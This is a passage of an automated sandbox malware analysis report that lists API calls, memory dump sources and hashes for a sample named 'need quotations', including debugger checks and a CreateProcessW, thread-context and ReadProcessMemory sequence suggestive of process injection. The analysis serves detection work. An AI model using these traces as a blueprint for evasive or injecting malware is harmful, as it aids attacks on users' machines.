
APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0028C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0028C746

Strings

aut, xrefs: 0028C740

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 0d0e1c4ec0e7fe4908d206b3bad21a20a7e6d31f4333e6b51ee37968c7153b11
Instruction ID: 6f95875fac1f9849fd8c8587d8a8050bf9c67e5d294991127a9851d5802bcdde
Opcode Fuzzy Hash: 0d0e1c4ec0e7fe4908d206b3bad21a20a7e6d31f4333e6b51ee37968c7153b11
Instruction Fuzzy Hash: AFD05E7150030EABDB10AB90EC0EF9AB76C9700704F0001B07B54A50B2DAB0E6998B55

Function 0029F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e92bc19b237ea61da57af1c18571a7c23b23649499188a5d4d61031f764c3c6
Instruction ID: e82ab04799ab5b6879b5aacb05db60d6b1cd57def0d0b92b160f9212ef69b609
Opcode Fuzzy Hash: 6e92bc19b237ea61da57af1c18571a7c23b23649499188a5d4d61031f764c3c6
Instruction Fuzzy Hash: BCF179716183019FCB50DF28C980B5AB7E5FF88714F14892EF9999B292DB70E915CF82

Function 00244FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00245022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 002450CB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: c546473139ea00b8c7a251a5336bdcbecb47dab8cf9eaa0802b93dfee1e0e7cf
Instruction ID: bddff9c598895768a39f318534d9a7725d02813d638a43a0c500c35b06421a85
Opcode Fuzzy Hash: c546473139ea00b8c7a251a5336bdcbecb47dab8cf9eaa0802b93dfee1e0e7cf
Instruction Fuzzy Hash: 7C318EB4515711CFC729DF24D84569BBBE8FF48308F00092EF6DA82241E771A954CB92

Function 0026395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00263973

Part of subcall function 002681C2: __NMSG_WRITE.LIBCMT ref: 002681E9
Part of subcall function 002681C2: __NMSG_WRITE.LIBCMT ref: 002681F3

__NMSG_WRITE.LIBCMT ref: 0026397A

Part of subcall function 0026821F: GetModuleFileNameW.KERNEL32(00000000,00300312,00000104,00000000,00000001,00000000), ref: 002682B1
Part of subcall function 0026821F: ___crtMessageBoxW.LIBCMT ref: 0026835F

Part of subcall function 00261145: ___crtCorExitProcess.LIBCMT ref: 0026114B
Part of subcall function 00261145: ExitProcess.KERNEL32 ref: 00261154

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000001,00000000,?,?,0025F507,?,0000000E), ref: 0026399F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 0cfbe775b202efc9615ade66ee7470d3e94a105ada4eb9f8f09b49fb9e0a4f0b
Instruction ID: b45ea22d584917c898bf48b2752efcff29776d68729e2fab0a2f443d414870ac
Opcode Fuzzy Hash: 0cfbe775b202efc9615ade66ee7470d3e94a105ada4eb9f8f09b49fb9e0a4f0b
Instruction Fuzzy Hash: 1601D6312766029AE6167B35EC52B2A23589F82724F240126F505971D1DFF09DE04EA0

Function 0028C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0028C385,?,?,?,?,?,00000004), ref: 0028C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0028C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0028C708
CloseHandle.KERNEL32(00000000,?,0028C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0028C70F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: c0ae0a2deccf4337228c9480578ec99ae495d882cafe630be9ce7e0046b337cb
Instruction ID: 2eef04a0bfcef469a24221d1dcaf27d8d4fd8c2d3366b4ac227d1a6d5ada7c95
Opcode Fuzzy Hash: c0ae0a2deccf4337228c9480578ec99ae495d882cafe630be9ce7e0046b337cb
Instruction Fuzzy Hash: C1E08632141214B7D7212F54BC0DFCA7B18AB45760F144120FB14690E097F125219B98

Function 0028BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0028BB72

Part of subcall function 00261C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00267A85), ref: 00261CB1
Part of subcall function 00261C9D: GetLastError.KERNEL32(00000000,?,00267A85), ref: 00261CC3

_free.LIBCMT ref: 0028BB83
_free.LIBCMT ref: 0028BB95

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: 7cea75e83c651d09d08d238c0f1042174fa901966f03c0b904dfdc135c618f0c
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: 46E012A566274247DA2479796E44FB713CC4F043557180C1EB859E718ADF24F8B08AA8

Function 00242322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 002422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002424F1), ref: 00242303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002425A1
CoInitialize.OLE32(00000000), ref: 00242618
CloseHandle.KERNEL32(00000000), ref: 002B503A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: a65d1d28a5e4b216a38aaba6a3b2d792996ba88d915818faab527de88e64aa5a
Instruction ID: 999772be1146052ac7008f1f89bd6d8dc7ca00a1dab830dc4359ff022833e570
Opcode Fuzzy Hash: a65d1d28a5e4b216a38aaba6a3b2d792996ba88d915818faab527de88e64aa5a
Instruction Fuzzy Hash: CC71AFB8923245CBC31AEF5AADB0555BBECB759344B90496FE109CB7B1CB704414CF15

Function 00243A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00243A73

Part of subcall function 00261405: __lock.LIBCMT ref: 0026140B

Part of subcall function 00243ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00243AF3
Part of subcall function 00243ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00243B08

Part of subcall function 00243D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00243AA3,?), ref: 00243D45
Part of subcall function 00243D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00243AA3,?), ref: 00243D57
Part of subcall function 00243D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00301148,00301130,?,?,?,?,00243AA3,?), ref: 00243DC8
Part of subcall function 00243D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00243AA3,?), ref: 00243E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00243AB3

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: ff0fbdd6a6a119a38025ee9bb1f64da4a0975b03b581c9c77495307978917b4e
Instruction ID: 1871d1e807ae24fa311953014c6675c295445fee4662ca45899be095bbc90849
Opcode Fuzzy Hash: ff0fbdd6a6a119a38025ee9bb1f64da4a0975b03b581c9c77495307978917b4e
Instruction Fuzzy Hash: F2119D71914341DBC305EF29E84990FFBE9EB95750F00891FF885872A2DB7095A8CF92

Function 0026E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0026EA29
__close_nolock.LIBCMT ref: 0026EA42

Part of subcall function 00267BDA: __getptd_noexit.LIBCMT ref: 00267BDA

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 4509d57602886b51d66559c7d534863884c82dacacf3ca353b9efd1b24db2ea3
Instruction ID: 237526ff7f3e763a3ced31549c2faee844f769178c62c8c5b27ca15d176e80ce
Opcode Fuzzy Hash: 4509d57602886b51d66559c7d534863884c82dacacf3ca353b9efd1b24db2ea3
Instruction Fuzzy Hash: 2A11E5768356508ADB12BFE4D8567187A616F81335F270341E4201F1E2CBB48CE08FA5

Function 0025F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0026395C: __FF_MSGBANNER.LIBCMT ref: 00263973
Part of subcall function 0026395C: __NMSG_WRITE.LIBCMT ref: 0026397A
Part of subcall function 0026395C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000001,00000000,?,?,0025F507,?,0000000E), ref: 0026399F

std::exception::exception.LIBCMT ref: 0025F51E
__CxxThrowException@8.LIBCMT ref: 0025F533

Part of subcall function 00266805: RaiseException.KERNEL32(?,?,0000000E,002F6A30,?,?,?,0025F538,0000000E,002F6A30,?,00000001), ref: 00266856

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: f3820c71dca432281222dc984b71e52e23f78584114ee2ff33393cea3647f71f
Instruction ID: 94c036c0a43e4c2b87827078786df65a776ff27c394bc08588a086c1d039b9a8
Opcode Fuzzy Hash: f3820c71dca432281222dc984b71e52e23f78584114ee2ff33393cea3647f71f
Instruction Fuzzy Hash: 49F0A43116421E67DB04BFA9D905AEEB7AC9F00354F644539FE0892181DBB09AB48AA9

Function 002635E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__lock_file.LIBCMT ref: 00263629

Part of subcall function 00264E1C: __lock.LIBCMT ref: 00264E3F

__fclose_nolock.LIBCMT ref: 00263634

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 0d144a428525a66039da9ecc38866cb0f1ae394c2fb4dfefaf948efcda5628ee
Instruction ID: e6e7f98625dc3c0cec4cd90be4d3eed0ead244ad2be3043da8cb052b28367675
Opcode Fuzzy Hash: 0d144a428525a66039da9ecc38866cb0f1ae394c2fb4dfefaf948efcda5628ee
Instruction Fuzzy Hash: F5F02B31C30204AAD711FF64C80676EB6A46F00334F258118E411AB2C1C7BC8AE19F99

Function 01948675 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01948E33
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01948EC9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01948EEB

Memory Dump Source

Source File: 00000000.00000002.1694616863.0000000001947000.00000040.00000020.00020000.00000000.sdmp, Offset: 01947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1947000_need quotations.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: d74bb2e1098cec97fc3a2beb0838be16505e98f3e57f0cc39068aa812288fe4f
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: EF12CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 0024E8A0 Relevance: 1.7, APIs: 1, Instructions: 204windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0024E959

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 8df4276006af5ad588cd3543a0eb325da8bdf416105436288b2f88439467e9b4
Instruction ID: e8906a2f51a0b7b35611cebcdd39f10d5574359f518ec6c81fcacfeb0353ba4c
Opcode Fuzzy Hash: 8df4276006af5ad588cd3543a0eb325da8bdf416105436288b2f88439467e9b4
Instruction Fuzzy Hash: 2A7137709243918FFF2ACF24C8887AA7BD4FB55304F08497AEC858F291D7719895CB82

Function 00262957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00262A0B

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: cd59e7a1cd291a044ec34b72d1fe99ba400fb6d7abdd0204b44a3616c17273c9
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: BD419531721F07DFDB288EA9C8815AE77A6AF84360B24852DE855C7280D6B4DDE98B40

Function 0025ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0025EDC7

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 35795d7fd61be7021b1ed5fcdcd7566fe4820bb54faa5ec686b4ef352f14dbbc
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: FF310970A11106DBCB18DF18C480969FBBAFF49341B6586A5E809CB255DB30EED5CF84

Function 002B9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 002B9A80

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 464338499668ce6cab78eb291dbec84a4019dc8d6d1f8f859fbcd0144c490f1b
Instruction ID: 07982f0627715e0339b1a2e64f9bb1ce3a0b0730391601a60f6b23548013cba7
Opcode Fuzzy Hash: 464338499668ce6cab78eb291dbec84a4019dc8d6d1f8f859fbcd0144c490f1b
Instruction Fuzzy Hash: 00415B705246118FDB24CF14C484B1ABBE0BF45348F1989ACE99A4B362D372ECA9CF46

Function 002441A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00244214: FreeLibrary.KERNEL32(00000000,?), ref: 00244247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002439FE,?,00000001), ref: 002441DB

Part of subcall function 00244291: FreeLibrary.KERNEL32(00000000), ref: 002442C4

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 7a450e8e689d80e9fe5138f9ae3eaee4d08696a395a37cf66af24effb5774a62
Instruction ID: b3f25c9c568fede4202f8b14eeddc8311963d22e6de2e2bb90eaf24b17f69400
Opcode Fuzzy Hash: 7a450e8e689d80e9fe5138f9ae3eaee4d08696a395a37cf66af24effb5774a62
Instruction Fuzzy Hash: D911A731720306AADB18FF74DC16FAE77A59F40700F108429B996A61C1DEB09A219F60

Function 002B9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 002B9B51

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 534ba539b68173ba93fe602423594a087c1daca8ba7adb8759eabdb304b5e3a8
Instruction ID: 13c4c8735ed3b60bce34ca5342a8837702706e44fe49673eb5c384ee67c751af
Opcode Fuzzy Hash: 534ba539b68173ba93fe602423594a087c1daca8ba7adb8759eabdb304b5e3a8
Instruction Fuzzy Hash: 7B216970528601CFDB24DF24C884B1ABBF1BF85305F15496CE99A4B221D771F869CF56

Function 0026AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0026AFC0

Part of subcall function 00267BDA: __getptd_noexit.LIBCMT ref: 00267BDA

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

